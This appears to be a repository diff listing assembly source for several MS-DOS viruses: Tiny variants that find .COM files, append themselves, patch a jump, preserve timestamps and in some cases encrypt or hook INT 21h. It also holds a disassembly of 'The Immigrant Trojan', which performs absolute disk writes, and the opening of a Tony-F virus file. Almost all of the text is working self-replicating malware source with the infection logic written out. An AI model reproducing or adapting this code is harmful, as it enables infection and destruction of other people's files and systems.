xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
sub ax,3 ; Subtract 3 (first instruction length)
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start


102
MSDOS/Virus.MSDOS.Unknown.tiny-b.asm Normal file
View File

@ -0,0 +1,102 @@
PAGE ,132
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv
ASSUME SS:tinyv
ASSUME DS:tinyv
H00000 DB 0
H00001 DB 255 DUP(?)
program PROC FAR
ASSUME ES:tinyv
begin:
JMP pgstart ; start program
exlbl LABEL BYTE
db 0CDh, 20h, 7, 8, 9
pgstart:
CALL tinyvir
mnprg PROC NEAR
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP,offset exlbl ; Add to get original offset
LEA DX,[SI+fspec] ; get filespec (*.COM)
SUB CX,CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT 21H ; ----\/----
JC ack ; no more files found, terminate virus
MOV DX,009EH ; set file name pointer
MOV AX,3D02H ; open file
INT 21H ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
JMP whatever
ack:
JMP nofile
whatever:
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer (?)
MOV CX,0003H ; read 3 bytes
INT 21H ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
infect:
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
SUB CX,CX ; " " " " " " (0 here)
NOP
MOV AX,4200H ; move file
INT 21H ; do it!
MOV DX,DI ; set dest index to area for buffer (?)
MOV CX,0002H ; two bytes
NOP
MOV AH,3FH ; read file
INT 21H ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
NOP
SUB DX,DX ; clear regs
SUB CX,CX ; " "
MOV AX,4202H ; move file pointer
INT 21H ; do it!
CMP DX,00H ; new pointer location 0?
NOP
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
MOV [SI+offset endprog+3],AX; point to data
NOP
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT 21H ; do it!
JC exit ; error, bug out
MOV AX,4200H ; move pointer
NOP
SUB CX,CX ; clear reg
MOV DX,OFFSET H00001 ; where to set pointer
NOP
INT 21H ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
NOP
MOV CX,0002H ; two bytes (the JMP)
INT 21H ; do it!
exit:
MOV AH,3EH ; close file
INT 21H ; do it!
nofile:
JMP BP ; go to original file
mnprg ENDP
program ENDP
blnkdat LABEL WORD
DW 0000H
fspec LABEL WORD
DB '*.COM'
DB 0
endprog LABEL WORD
tinyv ENDS
END program

101
MSDOS/Virus.MSDOS.Unknown.tiny-c.asm Normal file
View File

@ -0,0 +1,101 @@
PAGE ,132
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv
ASSUME SS:tinyv
ASSUME DS:tinyv
H00000 DB 0
H00001 DB 255 DUP(?)
program PROC FAR
ASSUME ES:tinyv
begin:
JMP pgstart ; start program
exlbl LABEL BYTE
db 0CDh, 20h, 7, 8, 9
pgstart:
CALL tinyvir
mnprg PROC NEAR
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP,offset exlbl ; Add to get original offset
LEA DX,[SI+fspec] ; get filespec (*.COM)
SUB CX,CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT 21H ; ----\/----
JC hiccup ; no more files found, terminate virus
MOV DX,009EH ; set file name pointer
MOV AX,3D02H ; open file
INT 21H ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer (?)
MOV CX,0003H ; read 3 bytes
INT 21H ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP nofile
infect:
MOV AX,5700h ; get date function
INT 21h ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
SUB CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT 21H ; do it!
MOV DX,DI ; set dest index to area for buffer (?)
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT 21H ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
SUB DX,DX ; clear regs
SUB CX,CX ; " "
MOV AX,4202H ; move file pointer
INT 21H ; do it!
CMP DX,00H ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT 21H ; do it!
JC exit ; error, bug out
MOV AX,4200H ; move pointer
SUB CX,CX ; clear reg
MOV DX,OFFSET H00001 ; where to set pointer
INT 21H ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
MOV CX,0002H ; two bytes (the JMP)
INT 21H ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT 21h ; do it!
exit:
MOV AH,3EH ; close file
INT 21H ; do it!
nofile:
JMP BP ; go to original file
mnprg ENDP
program ENDP
blnkdat LABEL WORD
DW 0000H
fspec LABEL WORD
DB '*.COM'
DB 0
endprog LABEL WORD
tinyv ENDS
END program

182
MSDOS/Virus.MSDOS.Unknown.tiny-f.asm Normal file
View File

@ -0,0 +1,182 @@
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
ORG 100h
DOS EQU 21h
start: JMP pgstart
exlbl: db 0CDh, 20h, 7, 8, 9
pgstart:CALL tinyvir
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP, OFFSET exlbl
CALL endecrpt
JMP SHORT realprog
;-----------------------------------------------------------------------------
; nonencrypted subroutines start here
;-----------------------------------------------------------------------------
; PCM's encryption was stupid, mine is better - Dark Angel
endecrpt:
; Only need to save necessary registers - Dark Angel
PUSH AX ; store registers
PUSH BX
PUSH CX
PUSH SI
; New, better, more compact encryption engine
MOV BX, [SI+EN_VAL]
ADD SI, offset realprog
MOV CX, endenc - realprog
SHR CX, 1
JNC start_encryption
DEC SI
start_encryption:
MOV DI, SI
encloop:
LODSW ; DS:[SI] -> AX
XOR AX, BX
STOSW
LOOP encloop
POP SI ; restore registers
POP CX
POP BX
POP AX
RET
;-----end of encryption routine
nfect:
CALL endecrpt
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT DOS ; do it!
PUSHF
CALL endecrpt
POPF
JC outa1 ; error, bug out
RET
outa1:
JMP exit
;-----------------------------------------------------------------------------
; Unencrypted routines end here
;-----------------------------------------------------------------------------
realprog:
CLD ; forward direction for string ops
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
; Instead, set DTA to SI+ENDPROG+131h
MOV AH, 1Ah ; Set DTA
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
INT 21h
LEA DX,[SI+fspec] ; get filespec (*.COM)
XOR CX, CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT DOS ; ----\/----
JC hiccup ; no more files found, terminate virus
; Next part had to be changed to account for new DTA address - Dark Angel
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
; (offset 30 is DTA filename start)
MOV AX,3D02H ; open file
INT DOS ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer
MOV CX,0003H ; read 3 bytes
INT DOS ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP exit
infect:
MOV AX,5700h ; get date function
INT DOS ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
; Tighter Code here - Dark Angel
XOR CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT DOS ; do it!
MOV DX,DI ; set dest index to area for buffer
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT DOS ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
getaval: ; encryption routine starts here
; My modifications here - Dark Angel
MOV AH, 2Ch ; DOS get TIME function
INT DOS ; do it!
OR DX, DX ; Is it 0?
JE getaval ; yeah, try again
MOV word ptr [si+offset en_val], DX ; Store it
; Tighter code here - Dark Angel
XOR DX,DX ; clear regs
XOR CX,CX ; " "
MOV AX,4202H ; move file pointer
INT DOS ; do it!
OR DX,DX ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
CALL nfect
MOV AX,4200H ; move pointer
XOR CX, CX ; clear reg
MOV DX,OFFSET 00001 ; where to set pointer
INT DOS ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
MOV CX,0002H ; two bytes (the JMP)
INT DOS ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT DOS ; do it!
exit:
MOV AH,3EH ; close file
INT DOS ; do it!
; Return DTA to old position - Dark Angel
MOV AH, 1Ah ; Set DTA
MOV DX, 80h ; to PSP DTA
INT 21h
JMP BP
;-----------------------------------------------------------------------------
; encrypted data goes here
;-----------------------------------------------------------------------------
fspec LABEL WORD
DB '*.COM',0
nondata DB 'Tiny-F version 1.1' ; Program identification
DB '˜€×@&î·³½ë' ; author identification
DB 'Released 10-19-91' ; release date
endenc LABEL BYTE ; end of encryption zone
;-----------------------------------------------------------------------------
; nonencrypted data goes anywhere after here
;-----------------------------------------------------------------------------
blnkdat LABEL WORD
DW 0000H
; Only en_val is needed now because of new encryption mechanism
en_val DW 0h
endprog LABEL WORD
tinyv ENDS
END start

120
MSDOS/Virus.MSDOS.Unknown.tiny.asm Normal file
View File

@ -0,0 +1,120 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ S ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 4-Aug-90 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_2e equ 1ABh ; (946E:01AB=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
s proc far
start:
jmp loc_1 ; (0108)
db 0CDh, 20h, 7, 8, 9
loc_1:
call sub_1 ; (010B)
s endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop si
sub si,10Bh
mov bp,data_1[si] ; (946E:01A0=0)
add bp,103h
lea dx,[si+1A2h] ; Load effective addr
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
loc_2:
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_6 ; Jump if carry Set
mov dx,9Eh
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
lea dx,[si+1A8h] ; Load effective addr
mov di,dx
mov cx,3
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp byte ptr [di],0E9h
je loc_4 ; Jump if equal
loc_3:
mov ah,4Fh ; 'O'
jmp short loc_2 ; (0120)
loc_4:
mov dx,[di+1]
mov data_1[si],dx ; (946E:01A0=0)
xor cx,cx ; Zero register
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,di
mov cx,2
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp word ptr [di],807h
je loc_3 ; Jump if equal
xor dx,dx ; Zero register
xor cx,cx ; Zero register
mov ax,4202h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
cmp dx,0
jne loc_3 ; Jump if not equal
cmp ah,0FEh
jae loc_3 ; Jump if above or =
mov ds:data_2e[si],ax ; (946E:01AB=0)
mov ah,40h ; '@'
lea dx,[si+105h] ; Load effective addr
mov cx,0A3h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_5 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,1
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
lea dx,[si+1ABh] ; Load effective addr
mov cx,2
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_5:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_6:
jmp bp ;*Register jump
data_1 dw 0 ; Data table (indexed access)
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
sub_1 endp
seg_a ends
end start

94
MSDOS/Virus.MSDOS.Unknown.tiny133.asm Normal file
View File

@ -0,0 +1,94 @@
VSize=085h
Code Segment
Assume CS:Code
org 0
db 4Dh
jmp Start
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
movsw
movsw
mov es, cx
cmpsb
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
stosw
jcxz Loop0
xchg ax, bx
StartFile:
push ds
pop es
ret
Int21: cmp ax, 4B00h
jne End21
Exec: push ax
push bx
push dx
push ds
push es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ;Zero AH
cwd ;Zero DX
mov bx, si ;Move handle to BX
mov ds, ax ;Set DS and ES to 60h,
mov es, ax ;the virus data segment
mov ah, 3Fh ;Read first 4 bytes
int 69h
mov al, 4Dh
scasb ;Check for 4D5Ah or infected file mark
je Close ;.EXE or already infected
mov al, 2
call LSeek ;Seek to the end, SI now contains file size
mov cl, VSize ;Virus size in CX, prepare to write
int 69h ;AH is 40h, i.e. Write operation
mov ax, 0E94Dh ;Virus header in AX
stosw ;Store it
xchg ax, si ;Move file size in AX
stosw ;Complete JMP instruction
xchg ax, dx ;Zero AX
call LSeek ;Seek to the beginning
int 69h ;AH is 40h, write the virus header
Close: mov ah,3Eh ;Close the file
int 69h
EndExec: pop es
pop ds
pop dx
pop bx
pop ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ;Seek operation
cwd ;Zero DX
DoInt21: xor cx, cx ;External entry for Open, zero cx
int 69h
mov cl, 4 ;4 bytes will be read/written
xchg ax, si ;Store AX in SI
mov ax, 4060h ;Prepare AH for Write
xor di, di ;Zero DI
ret
VLen = $ - offset Bytes
Code EndS
End


116
MSDOS/Virus.MSDOS.Unknown.tinyd.asm Normal file
View File

@ -0,0 +1,116 @@
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv
ASSUME SS:tinyv
ASSUME DS:tinyv
H00000 DB 0
H00001 DB 255 DUP(?)
program PROC FAR
ASSUME ES:tinyv
begin:
JMP pgstart ; start program
exlbl LABEL BYTE
db 0CDh, 20h, 7, 8, 9
pgstart:
CALL tinyvir
mnprg PROC NEAR
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP,offset exlbl ; Add to get original offset
LEA DX,[SI+fspec] ; get filespec (*.COM)
SUB CX,CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT 21H ; ----\/----
JC hiccup ; no more files found, terminate virus
MOV DX,009EH ; set file name pointer
MOV AX,3D02H ; open file
INT 21H ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer (?)
MOV CX,0003H ; read 3 bytes
INT 21H ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP nofile
infect:
MOV AX,5700h ; get date function
INT 21h ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
SUB CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT 21H ; do it!
MOV DX,DI ; set dest index to area for buffer (?)
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT 21H ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
SUB DX,DX ; clear regs
SUB CX,CX ; " "
MOV AX,4202H ; move file pointer
INT 21H ; do it!
CMP DX,00H ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT 21H ; do it!
JC exit ; error, bug out
MOV AX,4200H ; move pointer
SUB CX,CX ; clear reg
MOV DX,OFFSET H00001 ; where to set pointer
INT 21H ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
MOV CX,0002H ; two bytes (the JMP)
INT 21H ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT 21h ; do it!
exit:
MOV AH,2Ah ; date function
INT 21h ; do it!
CMP AL,0h ; is it sunday?
JNE closal ; nope, quit
CMP DH,6h ; is it June?
JNE closal ; nope, quit
PUSH BX
PUSH SI
MOV AH,9h ; print string
MOV DX, OFFSET nondata ; string to print
ADD DX,SI
INT 21h ; print it
MOV DX, OFFSET nondat2 ; next string
ADD DX, SI
INT 21h ; print it!
POP BX
closal: MOV AH,3EH ; close file
INT 21H ; do it!
nofile: JMP BP ; go to original file
mnprg ENDP
program ENDP
blnkdat LABEL WORD
DW 0000H
fspec LABEL WORD
DB '*.COM'
DB 0
nondata DB 'Tiny-D version 1.1$ '; Program identification
nondat2 DB ' by ˜€×@&î·³½ë$' ; author identification
endprog LABEL WORD
tinyv ENDS
END program

310
MSDOS/Virus.MSDOS.Unknown.tit.asm Normal file
View File

@ -0,0 +1,310 @@
ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #1 - YAM '92
Article Title: The Immigrant Trojan Disassembly
Author: Natas Kaupas
;*****************************************************************************
; Dissasembly of The Immigrant Trojan (TIT)
; Dissasembly by Dark Angel
;
; Just save this and compile it with TASM.
;*****************************************************************************
PAGE 59,132
data_6e equ 2000h ; (0010:2000=89h)
data_8e equ 0Ch ; (8096:000C=0)
data_10e equ 87F8h ; (8096:87F8=0)
data_11e equ 0CDF3h ; (8096:CDF3=0)
; Tasm 1.00 will output an extra NOP (90h) on forward memory references
; if the segment is declared after the reference. Segments are declared
; prior to any code to allow re-assembly.
seg_B segment byte public
seg_B ends
seg_C segment byte public
seg_C ends
;-------------------------------------------------------------- seg_a ----
seg_a segment byte public
assume cs:seg_a , ds:seg_a , ss:stack_seg_c
db 0FDh,0FFh, 00h,0FFh,0F8h, 0Eh
db 0B8h, 05h, 00h, 8Eh,0D8h,0BDh
db 01h, 00h,0BAh, 0Dh, 00h,0B4h
db 0FFh,0FFh
db 9
db 0CDh, 21h, 80h, 3Eh, 0Ch, 00h
db 1Ah, 7Dh, 19h,0B4h, 05h,0B5h
db 00h,0B6h, 00h,0E1h, 79h, 8Ah
db 16h,0F3h,0CDh, 13h,0BAh, 6Ah
db 0E6h,0FEh, 06h,0F8h, 87h,0F3h
db 0EBh,0E0h,0B0h, 02h
loc_2:
mov cx,2BCh
mov dx,0FFC9h
stc ; Set carry flag
mov ds,[di+63h]
mov bx,[di+37h]
int 26h ; Absolute disk write, drive al
mov dx,0E326h
mov ax,0F000h
dec word ptr [si-5]
add [bp+si],al
or ax,440Ah
db 65h, 63h, 6Fh, 64h, 69h, 6Eh
db 0FFh, 7Fh
db 'g system files $'
db 0F8h, 7Fh,0E7h
db 'Ya', 27h, ' been hit'
db 0F8h,0FFh,0F7h
db 'y The Immigr'
db 0E1h, 21h, 61h, 6Eh,0EFh, 54h
db 72h, 6Fh, 6Ah,0F8h, 20h,0CEh
db 0C3h,0C4h, 65h, 64h,0E2h, 6Fh
db 78h,0C3h
db 69h
locloop_3:
jmp bx ;*Register jump
db 'a. [C.S.A.]'
db 0BEh, 2Eh, 02h, 00h, 24h, 00h
db 0F0h
db 13 dup (0)
seg_a ends
;-------------------------------------------------------------- seg_b ----
seg_b segment byte public
assume cs:seg_b , ds:seg_b , ss:stack_seg_c
db 10h, 00h
data_13 dw 0
data_14 dw 100h
data_15 dw 0Ch
data_16 dw 0Ch
data_17 dw 12h
data_18 dw 15Ch
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;
; Program Entry Point
;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
tit proc far
start:
push es
push cs
pop ds
mov cx,data_18 ; (80B2:000C=15Ch)
mov si,cx
dec si
mov di,si
mov bx,ds
add bx,data_17 ; (80B2:000A=12h)
mov es,bx
std ; Set direction flag
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
push bx
mov ax,2Bh
push ax
retf
mov bp,cs:data_16 ; (80B2:0008=0Ch)
mov dx,ds
loc_6:
mov ax,bp
cmp ax,1000h
jbe loc_7 ; Jump if below or =
mov ax,1000h
loc_7:
sub bp,ax
sub dx,ax
sub bx,ax
mov ds,dx
mov es,bx
mov cl,3
shl ax,cl ; Shift w/zeros fill
mov cx,ax
shl ax,1 ; Shift w/zeros fill
dec ax
dec ax
mov si,ax
mov di,ax
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
or bp,bp ; Zero ?
jnz loc_6 ; Jump if not zero
cld ; Clear direction
mov es,dx
mov ds,bx
xor si,si ; Zero register
xor di,di ; Zero register
mov dx,10h
lodsw ; String [si] to ax
mov bp,ax
loc_8:
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_9 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_9:
jnc loc_10 ; Jump if carry=0
movsb ; Mov [si] to es:[di]
jmp short loc_8 ; (0069)
loc_10:
xor cx,cx ; Zero register
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_11 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_11:
jc loc_14 ; Jump if carry Set
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_12 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_12:
rcl cx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_13 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_13:
rcl cx,1 ; Rotate thru carry
inc cx
inc cx
lodsb ; String [si] to al
mov bh,0FFh
mov bl,al
jmp locloop_15 ; (00BB)
loc_14:
lodsw ; String [si] to ax
mov bx,ax
mov cl,3
shr bh,cl ; Shift w/zeros fill
or bh,0E0h
and ah,7
jz loc_16 ; Jump if zero
mov cl,ah
inc cx
inc cx
locloop_15:
mov al,es:[bx+di]
stosb ; Store al to es:[di]
loop locloop_15 ; Loop if cx > 0
jmp short loc_8 ; (0069)
loc_16:
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_18 ; Jump if zero
cmp al,1
je loc_17 ; Jump if equal
mov cl,al
inc cx
jmp short locloop_15 ; (00BB)
loc_17:
mov bx,di
and di,0Fh
add di,data_6e ; (0010:2000=89h)
mov cl,4
shr bx,cl ; Shift w/zeros fill
mov ax,es
add ax,bx
sub ax,200h
mov es,ax
mov bx,si
and si,0Fh
shr bx,cl ; Shift w/zeros fill
mov ax,ds
add ax,bx
mov ds,ax
jmp loc_8 ; (0069)
db 41h, 43h, 2Dh, 44h, 43h
loc_18:
push cs
pop ds
mov si,offset data_19 ; (80B2:0158=11h)
pop bx
add bx,10h
mov dx,bx
xor di,di ; Zero register
loc_19:
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_21 ; Jump if zero
mov ah,0
loc_20:
add di,ax
mov ax,di
and di,0Fh
mov cl,4
shr ax,cl ; Shift w/zeros fill
add dx,ax
mov es,dx
add es:[di],bx
jmp short loc_19 ; (0109)
loc_21:
lodsw ; String [si] to ax
or ax,ax ; Zero ?
jnz loc_22 ; Jump if not zero
add dx,0FFFh
mov es,dx
jmp short loc_19 ; (0109)
loc_22:
cmp ax,1
jne loc_20 ; Jump if not equal
mov ax,bx
mov di,data_14 ; (80B2:0004=100h)
mov si,data_15 ; (80B2:0006=0Ch)
add si,ax
add data_13,ax ; (80B2:0002=0)
sub ax,10h
mov ds,ax
mov es,ax
xor bx,bx ; Zero register
cli ; Disable interrupts
mov ss,si
mov sp,di
sti ; Enable interrupts
jmp dword ptr cs:[bx] ;*
data_19 db 11h
db 0, 1, 0
db 292 dup (0)
tit endp
seg_b ends
;--------------------------------------------------------- stack_seg_c ---
stack_seg_c segment word stack 'STACK'
db 128 dup (0)
stack_seg_c ends
end start

4787
MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm Normal file
View File

File diff suppressed because it is too large Load Diff

4284
MSDOS/Virus.MSDOS.Unknown.tmc_b.asm Normal file
View File

File diff suppressed because it is too large Load Diff

201
MSDOS/Virus.MSDOS.Unknown.tony-f.asm Normal file
View File

@ -0,0 +1,201 @@
;------------------------------------------------------------------------------;
; ;
; ‚¨°³± Tony-F ;
; ;
; Tony_F ¥ ¯ ° §¨²¥­ ¢¨°³±,¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤­®²® - ¯°¨ ±² °²¨° ­¥;
; ­  § ° §¥­ ´ ©« ¢¨°³±º² ¯°¥²º°±¢  ¶¿« ²  ²¥ª³¹  ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢  ¢±¨·ª¨ ;
; ´ ©«®¢¥ ®²£®¢ °¿¹¨ ­  ?*.COM, ª ²® ? § ¢¨±¨ ®² ¤ ² ² . ;
; Tony-F ±¥ ­ ±² ­¿¢  ¯°¥¤¨ ª®¤  ­  § ° §¥­¨¿ ´ ©«, ¢¨°³±º² ®°£ ­¨§¨°  ;
